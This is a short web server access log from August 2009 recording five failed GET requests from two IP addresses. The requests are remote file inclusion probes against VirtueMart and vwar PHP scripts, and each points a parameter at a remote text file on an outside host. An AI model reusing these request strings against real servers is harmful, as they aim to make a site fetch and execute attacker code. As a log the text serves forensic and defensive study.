110.45.138.139 - - [02/Aug/2009:01:00:01 -0400] "GET /logs/access_log.Q109062600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
70.87.217.26 - - [02/Aug/2009:01:00:36 -0400] "GET //vwar/backup/errors.php?error=http://rugby-parc84.com/w-agora/doc/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
70.87.217.26 - - [02/Aug/2009:01:00:36 -0400] "GET /logs//vwar/backup/errors.php?error=http://rugby-parc84.com/w-agora/doc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
70.87.217.26 - - [02/Aug/2009:01:00:36 -0400] "GET /logs/access_log.Q109061000%20%20//vwar/backup/errors.php?error=http://rugby-parc84.com/w-agora/doc/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
70.87.217.26 - - [02/Aug/2009:01:00:40 -0400] "GET /logs//vwar/backup/errors.php?error=http://rugby-parc84.com/w-agora/doc/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
